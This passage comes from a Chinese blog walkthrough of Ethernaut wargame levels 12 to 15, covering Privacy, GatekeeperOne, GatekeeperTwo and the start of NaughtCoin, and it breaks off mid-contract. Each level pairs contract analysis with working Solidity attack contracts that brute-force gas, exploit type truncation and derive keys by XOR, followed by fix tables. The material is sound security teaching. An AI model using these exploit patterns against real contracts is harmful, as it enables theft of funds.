class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x00000000000000000000000000000000000000000000000000000000f7f5ff0a&quot;</span><br>	<span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">,</span><br>	<span class="hljs-attr">&quot;0xc2575a0e9e593c00f959f8c92f12db2869c3395a3b0502d05e2516446f71f85b&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>		<span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x0000000000000000000000000000000000000000000000000000000000000003&quot;</span><span class="hljs-punctuation">,</span><br>		<span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x616c706861000000000000000000000000000000000000000000000000000000&quot;</span><br>	<span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">,</span><br>	<span class="hljs-attr">&quot;0x8a35acfbc15ff81a39ae7d344fd709f28e8600b4aa8c65c6b64bfe7fe36bd19b&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>		<span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x0000000000000000000000000000000000000000000000000000000000000004&quot;</span><span class="hljs-punctuation">,</span><br>		<span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x6265746100000000000000000000000000000000000000000000000000000000&quot;</span><br>	<span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">,</span><br>	<span class="hljs-attr">&quot;0x036b6384b5eca791c62761152d0c79bb0604c104a5fb6f4eb0703f3154bb3db0&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>		<span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x0000000000000000000000000000000000000000000000000000000000000005&quot;</span><span class="hljs-punctuation">,</span><br>		<span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0x67616d6d61000000000000000000000000000000000000000000000000000000&quot;</span><br>	<span class="hljs-punctuation">&#125;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>有个判断条件<code>require(_key == bytes16(data[2]));</code>，我们就会发现，原先不是bytes32吗，怎么变成了bytes16，这里是一个由大向下转的一个操作，在<code>bytes32</code>变量中，我们有这样一个值<code>0x66a80b61b29ec044d14c4c8c613e762ba1fb8eeb0c454d1ee00ed6dedaa5b5c5</code>。如果我们把这个值放到<code>bytes16</code>时，新的值将是<code>0x66a80b61b29ec044d14c8c613e762b</code>。当从一个较小的类型转换到一个较大的类型时，没有什么问题。所有的高位都被填充为零，值不会改变。问题是当你把一个较大的类型转换到一个较小的类型时。根据数值的不同，你可能会遇到数据丢失的情况，因为这些高位被丢失和截断了。</p>
<p>那接下来就很简单了</p>
<p>我部署时传入的是</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs stylus">web3<span class="hljs-selector-class">.utils</span><span class="hljs-selector-class">.fromAscii</span>(<span class="hljs-string">&quot;alpha&quot;</span>)<br>web3<span class="hljs-selector-class">.utils</span><span class="hljs-selector-class">.fromAscii</span>(<span class="hljs-string">&quot;beta&quot;</span>)<br>web3<span class="hljs-selector-class">.utils</span><span class="hljs-selector-class">.fromAscii</span>(<span class="hljs-string">&quot;gamma&quot;</span>)<br><br><span class="hljs-selector-attr">[<span class="hljs-string">&quot;0x616c706861000000000000000000000000000000000000000000000000000000&quot;</span>, <span class="hljs-string">&quot;0x6265746100000000000000000000000000000000000000000000000000000000&quot;</span>, <span class="hljs-string">&quot;0x67616d6d61000000000000000000000000000000000000000000000000000000&quot;</span>]</span><br></code></pre></td></tr></table></figure>

<p>因为我是在Remix中部署的，所以前面不需要用<code>await</code></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs js">web3.<span class="hljs-property">eth</span>.<span class="hljs-title function_">getStorageAt</span>(<span class="hljs-string">&quot;合约地址&quot;</span>, <span class="hljs-number">3</span>).<span class="hljs-title function_">then</span>(<span class="hljs-variable language_">console</span>.<span class="hljs-property">log</span>)<br>web3.<span class="hljs-property">eth</span>.<span class="hljs-title function_">getStorageAt</span>(<span class="hljs-string">&quot;合约地址&quot;</span>, <span class="hljs-number">4</span>).<span class="hljs-title function_">then</span>(<span class="hljs-variable language_">console</span>.<span class="hljs-property">log</span>)<br>web3.<span class="hljs-property">eth</span>.<span class="hljs-title function_">getStorageAt</span>(<span class="hljs-string">&quot;合约地址&quot;</span>, <span class="hljs-number">5</span>).<span class="hljs-title function_">then</span>(<span class="hljs-variable language_">console</span>.<span class="hljs-property">log</span>)<br></code></pre></td></tr></table></figure>

<p>而此时的比较用的是slot&#x3D;4的数据</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504232228744.png" srcset="/img/loading.gif" lazyload alt="image-20250423222849629"></p>
<p>折半传进去就行</p>
<h4 id="修复方法-与第8关一样"><a href="#修复方法-与第8关一样" class="headerlink" title="修复方法(与第8关一样)"></a>修复方法(与第8关一样)</h4><ol>
<li><strong>不要将敏感信息保存在链上</strong>（哪怕是 <code>private</code> 也没用）。</li>
<li><strong>使用加密&#x2F;哈希验证</strong>，例如将 <code>bytes16</code> 的哈希保存，而不是明文。</li>
</ol>
<h2 id="第13关"><a href="#第13关" class="headerlink" title="第13关"></a>第13关</h2><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract GatekeeperOne <span class="hljs-punctuation">&#123;</span><br>    address public entrant;<br><br>    modifier gateOne() <span class="hljs-punctuation">&#123;</span><br>        require(msg.sender != tx.origin);<br>        _;<br>    <span class="hljs-punctuation">&#125;</span><br><br>    modifier gateTwo() <span class="hljs-punctuation">&#123;</span><br>        require(gasleft() % <span class="hljs-number">8191</span> == <span class="hljs-number">0</span>);<br>        _;<br>    <span class="hljs-punctuation">&#125;</span><br><br>    modifier gateThree(bytes8 _gateKey) <span class="hljs-punctuation">&#123;</span><br>        require(uint32(uint64(_gateKey)) == uint16(uint64(_gateKey))<span class="hljs-punctuation">,</span> <span class="hljs-string">&quot;GatekeeperOne: invalid gateThree part one&quot;</span>);<br>        require(uint32(uint64(_gateKey)) != uint64(_gateKey)<span class="hljs-punctuation">,</span> <span class="hljs-string">&quot;GatekeeperOne: invalid gateThree part two&quot;</span>);<br>        require(uint32(uint64(_gateKey)) == uint16(uint160(tx.origin))<span class="hljs-punctuation">,</span> <span class="hljs-string">&quot;GatekeeperOne: invalid gateThree part three&quot;</span>);<br>        _;<br>    <span class="hljs-punctuation">&#125;</span><br><br>    function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) <span class="hljs-punctuation">&#123;</span><br>        entrant = tx.origin;<br>        return <span class="hljs-literal"><span class="hljs-keyword">true</span></span>;<br>    <span class="hljs-punctuation">&#125;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>分析合约代码</p>
<p>定义了三个<a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/contracts.html#modifiers">函数修改器modifiers</a>，<code>gateOne()</code>，<code>gateTwo()</code>，<code>gateThree()</code></p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs scss">modifier <span class="hljs-built_in">gateOne</span>() &#123;<br>        <span class="hljs-built_in">require</span>(msg.sender != tx.origin); <span class="hljs-comment">//函数调用者不能是最初发送交易的人</span><br>        _;<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>了解一下<a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/units-and-global-variables.html"><code>gasleft()</code></a>函数，solidity官方文档有如下描述</p>
<blockquote>
<ul>
<li><code>gasleft() returns (uint256)</code>：剩余 gas</li>
</ul>
</blockquote>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs abnf">modifier gateTwo() &#123;<br>        require(gasleft() % <span class="hljs-number">8191</span> <span class="hljs-operator">=</span><span class="hljs-operator">=</span> <span class="hljs-number">0</span>)<span class="hljs-comment">; //剩余gas需要是8191的倍数</span><br>        _<span class="hljs-comment">;</span><br>    &#125;<br></code></pre></td></tr></table></figure>

<p><code>gateThree()</code>又是高向低转，推荐阅读</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/types.html#types-conversion-elementary-types">Solidity 文档：基本类型之间的转换</a></li>
<li><a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/types.html#types-conversion-literals">Solidity 文档：常量数字和基本类型之间的转换</a></li>
</ul>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs less"><span class="hljs-selector-tag">modifier</span> <span class="hljs-selector-tag">gateThree</span>(bytes8 _gateKey) &#123;<br>        <span class="hljs-selector-tag">require</span>(<span class="hljs-built_in">uint32</span>(<span class="hljs-built_in">uint64</span>(_gateKey)) == <span class="hljs-built_in">uint16</span>(<span class="hljs-built_in">uint64</span>(_gateKey)), <span class="hljs-string">&quot;GatekeeperOne: invalid gateThree part one&quot;</span>); <span class="hljs-comment">//从64到32，从64转到16，还是老规矩，舍掉高位</span><br>        <span class="hljs-selector-tag">require</span>(<span class="hljs-built_in">uint32</span>(<span class="hljs-built_in">uint64</span>(_gateKey)) != <span class="hljs-built_in">uint64</span>(_gateKey), <span class="hljs-string">&quot;GatekeeperOne: invalid gateThree part two&quot;</span>); <br>        <span class="hljs-selector-tag">require</span>(<span class="hljs-built_in">uint32</span>(<span class="hljs-built_in">uint64</span>(_gateKey)) == <span class="hljs-built_in">uint16</span>(<span class="hljs-built_in">uint160</span>(tx.origin)), <span class="hljs-string">&quot;GatekeeperOne: invalid gateThree part three&quot;</span>); <br>        <span class="hljs-selector-tag">_</span>;<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>而成为新的合约所有者，就需要同时满足上面的三个<code>gate</code></p>
<p>接下来就是逐个解决了</p>
<p>看第一个<code>require(msg.sender != tx.origin);</code></p>
<blockquote>
<p>当交易由EOA （外部账号）发起时，它直接与智能合约交互，这两个变量将具有相同的值。但是，如果它与一个中间人合约<code>A</code>交互，然后通过直接（call）调用（不是<code>delegatecall</code>）另一个合约<code>B</code>，在 B 合约里这些值将是不同的，在这种情况下。</p>
<ul>
<li><code>msg.sender</code>将是<code>A</code>合约的地址</li>
<li><code>tx.origin</code>将是EOA地址地址。</li>
</ul>
</blockquote>
<p>可以查阅我的第五关，有做演示</p>
<p>第二个，<code>require(gasleft() % 8191 == 0);</code>，要计算gas，可以看一下<a target="_blank" rel="noopener" href="https://github.com/yuange1024/ethereum_yellowpaper/blob/master/ethereum_yellow_paper_cn.pdf">以太坊黄皮书</a>（附录 H）的算术运算及其当前的 gas 成本,<del>但是。。。（bushi，真的会有人去算吗，光看那黄皮书就够头疼了</del></p>
<blockquote>
<p>Complex transactions (like contract creation) costs more than easier transactions (like sending someone some Ethers). Storing data to the blockchain costs more than reading the data, and reading constant variables <a target="_blank" rel="noopener" href="https://medium.com/coinmonks/ethernaut-lvl-12-privacy-walkthrough-how-ethereum-optimizes-storage-to-save-space-and-be-less-c9b01ec6adb6">costs less</a> than reading storage values.<br>复杂的交易（如创建合约）比简单的交易（如向某人发送一些以太币）成本更高。将数据存储到区块链的成本高于读取数据的成本，读取常量变量<a target="_blank" rel="noopener" href="https://medium.com/coinmonks/ethernaut-lvl-12-privacy-walkthrough-how-ethereum-optimizes-storage-to-save-space-and-be-less-c9b01ec6adb6">的成本</a>低于读取存储值的成本。</p>
</blockquote>
<p>虽然也可以用Remix调试来调出来，但是还是太麻烦，常见做法如下，</p>
<p>用一个循环从 <code>0~300</code> 之间偏移量，尝试找出一个 <code>gasleft()</code> % 8191 &#x3D;&#x3D; 0 的值。例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs solitiy">for (uint256 i = 0; i &lt; 300; i++) &#123;<br>    (bool success, ) = target.call&#123;gas: i + 8191 * 3&#125;(<br>        abi.encodeWithSignature(&quot;enter(bytes8)&quot;, gateKey)<br>    );<br>    if (success) &#123;<br>        break;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>为什么是 <code>8191 * 3</code> 起步？</p>
<ul>
<li>因为在 Remix 或硬编码中，实际执行消耗了一堆 gas，而我们不知道起点是多少。</li>
<li>所以先以 <code>8191 * n</code> 为大致基准点，再通过小范围遍历 <code>+ i</code> 来精调。</li>
</ul>
<table>
<thead>
<tr>
<th>项</th>
<th>理由</th>
</tr>
</thead>
<tbody><tr>
<td><code>8191 * 3</code></td>
<td>预留足够 gas 跑完整个调用链</td>
</tr>
<tr>
<td><code>+ i</code></td>
<td>精确调整 gas，命中 <code>% 8191 == 0</code> 条件</td>
</tr>
<tr>
<td>遍历 <code>i</code></td>
<td>因为 gas 消耗每次略有不同，只能试出合适的值，遍历的范围可以稍微大一点，就像我用了3000</td>
</tr>
</tbody></table>
<p>第三个就是过掉那几个转换就行了，可以直接用我们的EOA地址类推出来</p>
<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504241643460.png" srcset="/img/loading.gif" lazyload alt="image-20250424164351671"></p>
<p>也可以用代码，直接取到<code>tx.orgin</code>进行取uint16，然后转到uint64，再加上2**32，保证前32不为0</p>
<figure class="highlight vala"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs vala">function generateGateKey() <span class="hljs-keyword">internal</span> view returns (bytes8) &#123;<br>        <span class="hljs-keyword">uint16</span> origin16 = <span class="hljs-keyword">uint16</span>(uint160(tx.origin)); <span class="hljs-comment">// 取地址最后两个字节</span><br>        <span class="hljs-keyword">uint64</span> gateKey = <span class="hljs-keyword">uint64</span>(<span class="hljs-keyword">uint32</span>(origin16)) + <span class="hljs-number">2</span>**<span class="hljs-number">32</span>; <span class="hljs-comment">// 加上高位不为0</span><br>        <span class="hljs-keyword">return</span> bytes8(gateKey);<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>哦呼，接下来就是攻击脚本</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>interface IGatekeeperOne <span class="hljs-punctuation">&#123;</span><br>    function enter(bytes8 _gateKey) external returns (bool);<br><span class="hljs-punctuation">&#125;</span><br><br>contract GatekeeperOneAttack <span class="hljs-punctuation">&#123;</span><br>    address public target;<br><br>    constructor(address _target) <span class="hljs-punctuation">&#123;</span><br>        target = _target;<br>    <span class="hljs-punctuation">&#125;</span><br><br>    function generateGateKey() internal view returns (bytes8) <span class="hljs-punctuation">&#123;</span><br>        uint16 origin16 = uint16(uint160(tx.origin)); <span class="hljs-comment">// 取地址最后两个字节</span><br>        uint64 gateKey = uint64(uint32(origin16)) + <span class="hljs-number">2</span>**<span class="hljs-number">32</span>; <span class="hljs-comment">// 加上高位不为0</span><br>        return bytes8(gateKey);<br>    <span class="hljs-punctuation">&#125;</span><br><br>    function attack() public <span class="hljs-punctuation">&#123;</span><br>        bytes8 gateKey = generateGateKey();<br><br>        <span class="hljs-comment">// 尝试 gas 的不同偏移量</span><br>        for (uint256 i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">3000</span>; i++) <span class="hljs-punctuation">&#123;</span><br>            (bool success<span class="hljs-punctuation">,</span> ) = target.call<span class="hljs-punctuation">&#123;</span>gas<span class="hljs-punctuation">:</span> <span class="hljs-number">8191</span> * <span class="hljs-number">4</span> + i<span class="hljs-punctuation">&#125;</span>(abi.encodeWithSignature(<span class="hljs-string">&quot;enter(bytes8)&quot;</span><span class="hljs-punctuation">,</span> gateKey)); <span class="hljs-comment">//稍微省一点点事</span><br>            if (success) <span class="hljs-punctuation">&#123;</span><br>                break;<br>            <span class="hljs-punctuation">&#125;</span><br>        <span class="hljs-punctuation">&#125;</span><br>    <span class="hljs-punctuation">&#125;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504241825246.png" srcset="/img/loading.gif" lazyload alt="image-20250424182510100"></p>
<h4 id="修复-1"><a href="#修复-1" class="headerlink" title="修复"></a>修复</h4><table>
<thead>
<tr>
<th>问题</th>
<th>修复建议</th>
</tr>
</thead>
<tbody><tr>
<td><code>gateOne</code> 可被合约绕过</td>
<td>使用授权逻辑替代，仅限制合约不够</td>
</tr>
<tr>
<td><code>gateTwo</code> 易被穷举 gas 绕过</td>
<td>删除 gas 相关的限制逻辑，尽量不要用<code>gasleft()</code></td>
</tr>
<tr>
<td><code>gateThree</code> 位操作不安全</td>
<td>替换为明确的身份验证逻辑，要尽量避免由大到小的转变。</td>
</tr>
</tbody></table>
<h2 id="第14关"><a href="#第14关" class="headerlink" title="第14关"></a>第14关</h2><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>contract GatekeeperTwo <span class="hljs-punctuation">&#123;</span><br>    address public entrant;<br><br>    modifier gateOne() <span class="hljs-punctuation">&#123;</span><br>        require(msg.sender != tx.origin);<br>        _;<br>    <span class="hljs-punctuation">&#125;</span><br><br>    modifier gateTwo() <span class="hljs-punctuation">&#123;</span><br>        uint256 x;<br>        assembly <span class="hljs-punctuation">&#123;</span><br>            x <span class="hljs-punctuation">:</span>= extcodesize(caller())<br>        <span class="hljs-punctuation">&#125;</span><br>        require(x == <span class="hljs-number">0</span>);<br>        _;<br>    <span class="hljs-punctuation">&#125;</span><br><br>    modifier gateThree(bytes8 _gateKey) <span class="hljs-punctuation">&#123;</span><br>        require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == type(uint64).max);<br>        _;<br>    <span class="hljs-punctuation">&#125;</span><br><br>    function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) <span class="hljs-punctuation">&#123;</span><br>        entrant = tx.origin;<br>        return <span class="hljs-literal"><span class="hljs-keyword">true</span></span>;<br>    <span class="hljs-punctuation">&#125;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>分析代码，跟上一关有点像，仍然是三个修改器，第一个和上一关一样，第二个是写了一个<a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/assembly.html"><code>assembly</code></a>内联汇编，推荐拓展阅读<a target="_blank" rel="noopener" href="https://learnblockchain.cn/article/675">Solidity 中编写内联汇编(assembly)的那些事</a>。</p>
<p>关于内联汇编，Solidity官方文档解释如下：</p>
<blockquote>
<p>你可以将 Solidity 语句与接近以太坊虚拟机语言的内联汇编交错使用。这为你提供了更细粒度的控制，特别是在通过编写库或优化 gas 使用来增强语言时非常有用。</p>
<p>Solidity 中用于内联汇编的语言称为 <a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/yul.html#yul">Yul</a>，并在其自己的部分中进行了文档说明。本节将仅涵盖内联汇编代码如何与周围的 Solidity 代码接口。</p>
<p>内联汇编是一种以低级别访问以太坊虚拟机的方法。这绕过了 Solidity 的几个重要安全特性和检查。 你应该仅在需要时使用它，并且只有在你对使用它有信心的情况下。</p>
<p>内联汇编块由 <code>assembly &#123; ... &#125;</code> 标记，其中大括号内的代码是 <a target="_blank" rel="noopener" href="https://learnblockchain.cn/docs/solidity/yul.html#yul">Yul</a> 语言的代码。</p>
<p>内联汇编代码可以访问本地 Solidity 变量，如下所述。</p>
<p>不同的内联汇编块不共享命名空间，即无法调用在不同内联汇编块中定义的 Yul 函数或访问 Yul 变量。</p>
<p>可重用的汇编库可以在不更改编译器的情况下增强 Solidity 语言。</p>
<p>你可以通过使用其名称访问 Solidity 变量和其他标识符。</p>
<p>值类型的本地变量可以直接在内联汇编中使用。它们可以被读取和赋值。</p>
</blockquote>
<p><code>extcodesize</code>调用将获得给定地址的合约代码大小 ，用 <code>assembly</code> 读取 <code>caller()</code>（也就是 <code>msg.sender</code>）地址上的代码大小 <code>extcodesize</code>。要求 <code>x == 0</code>，即调用者地址上当前<strong>没有代码</strong>。– 你可以在<a target="_blank" rel="noopener" href="https://github.com/yuange1024/ethereum_yellowpaper/blob/master/ethereum_yellow_paper_cn.pdf">黄皮书</a>的第7节中了解更多关于它的信息。</p>
<p>而在部署合约时，在构造函数中，地址已经被分配但代码尚未存储，所以在构造函数里调用这个合约时 <code>extcodesize == 0</code>。我说白了，就是你需要在<strong>构造函数中</strong>调用 <code>enter()</code> 才能通过这道门。</p>
<p>第三个也跟上差不多就是用了个异或。<code>msg.sender</code>（合约地址）经过 <code>keccak256</code> 哈希，再取前 8 字节并转换成 <code>uint64</code>，和传入的 <code>_gateKey</code> 异或后，结果必须是 <code>0xFFFFFFFFFFFFFFFF</code>，即 <code>type(uint64).max</code>。我们需要计算出 <code>_gateKey</code>，让它和 <code>keccak256(msg.sender)</code> 的前 8 字节异或结果为全 1。</p>
<p>学过数学的都知道，如果a^b&#x3D;c，那么a^c&#x3D;b。那我们直接<code>uint64(bytes8(keccak256(abi.encodePacked(msg.sender))))^type(uint64).max)</code>不就等于<code>uint64(_gateKey)</code>了。</p>
<p>ok，思路已经明了，上代码</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br>interface IGatekeeperTwo <span class="hljs-punctuation">&#123;</span><br>    function enter(bytes8 _gateKey) external returns (bool);<br><span class="hljs-punctuation">&#125;</span><br>contract Attack <span class="hljs-punctuation">&#123;</span><br>    constructor(address gatekeepertwo) <span class="hljs-punctuation">&#123;</span><br>        IGatekeeperTwo gatekeeper = IGatekeeperTwo(gatekeepertwo);<br><br>        bytes8 key = bytes8(uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ uint64(type(uint64).max));<br><br>        gatekeeper.enter(key);<br>    <span class="hljs-punctuation">&#125;</span> <br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://kingofyou.oss-cn-beijing.aliyuncs.com/D:%5CBolg%5Chexo-blog%5Csource%5C_posts%5C%E6%B5%8B%E8%AF%95%E6%96%87%E7%AB%A0202504242145865.png" srcset="/img/loading.gif" lazyload alt="image-20250424214532567"></p>
<p>拿下，<del>这个比上一关更好利用一些，因为不用尝试gas</del>。</p>
<h4 id="修复-2"><a href="#修复-2" class="headerlink" title="修复"></a>修复</h4><table>
<thead>
<tr>
<th>门</th>
<th>问题</th>
<th>修复建议</th>
</tr>
</thead>
<tbody><tr>
<td>gateOne</td>
<td>无漏洞，仅行为约束</td>
<td>可保留或移除</td>
</tr>
<tr>
<td>gateTwo</td>
<td>可被构造函数绕过</td>
<td>改为 <code>msg.sender.code.length &gt; 0</code> 检查</td>
</tr>
<tr>
<td>gateThree</td>
<td>gateKey 可反推</td>
<td>加入动态元素如 <code>block.timestamp</code>、<code>salt</code> 或封装逻辑</td>
</tr>
</tbody></table>
<h2 id="第15关"><a href="#第15关" class="headerlink" title="第15关"></a>第15关</h2><figure class="highlight typescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs typescript"><span class="hljs-comment">// SPDX-License-Identifier: MIT</span><br>pragma solidity ^<span class="hljs-number">0.8</span><span class="hljs-number">.0</span>;<br><br><span class="hljs-keyword">import</span> <span class="hljs-string">&quot;@openzeppelin/contracts/token/ERC20/ERC20.sol&quot;</span>;<br><br>contract <span class="hljs-title class_">NaughtCoin</span> is <span class="hljs-title class_">ERC20</span> &#123;<br>    <span class="hljs-comment">// string public constant name = &#x27;NaughtCoin&#x27;;</span><br>    <span class="hljs-comment">// string public constant symbol = &#x27;0x0&#x27;;</span><br>    <span class="hljs-comment">// uint public constant decimals = 18;</span><br>    uint256 <span class="hljs-keyword">public</span> timeLock = block.<span class="hljs-property">timestamp</span> + <span class="hljs-number">10</span> * <span class="hljs-number">365</span> days;<br>    uint256 <span class="hljs-keyword">public</span> <span class="hljs-variable constant_">INITIAL_SUPPLY</span>;<br>    address <span class="hljs-keyword">public</span> player;<br><br>    <span class="hljs-title function_">constructor</span>(<span class="hljs-params">address _player</span>) <span class="hljs-title class_">ERC20</span>(<span class="hljs-string">&quot;NaughtCoin&quot;</span>, <span class="hljs-string">&quot;0x0&quot;</span>) &#123;<br>        player = _player;<br>        <span class="hljs-variable constant_">INITIAL_SUPPLY</span> = <span class="hljs-number">1000000</span> * (<span class="hljs-number">10</span> ** <span class="hljs-title function_">uint256</span>(<span class="hljs-title function_">decimals</span>()));<br>        <span class="hljs-comment">// _totalSupply = INITIAL_SUPPLY;</span><br>        <span class="hljs-comment">// _balances[player] = INITIAL_SUPPLY;</span><br>        <span class="hljs-title function_">_mint</span>(player, <span class="hljs-variable constant_">INITIAL_SUPPLY</span>);<br>        emit <span 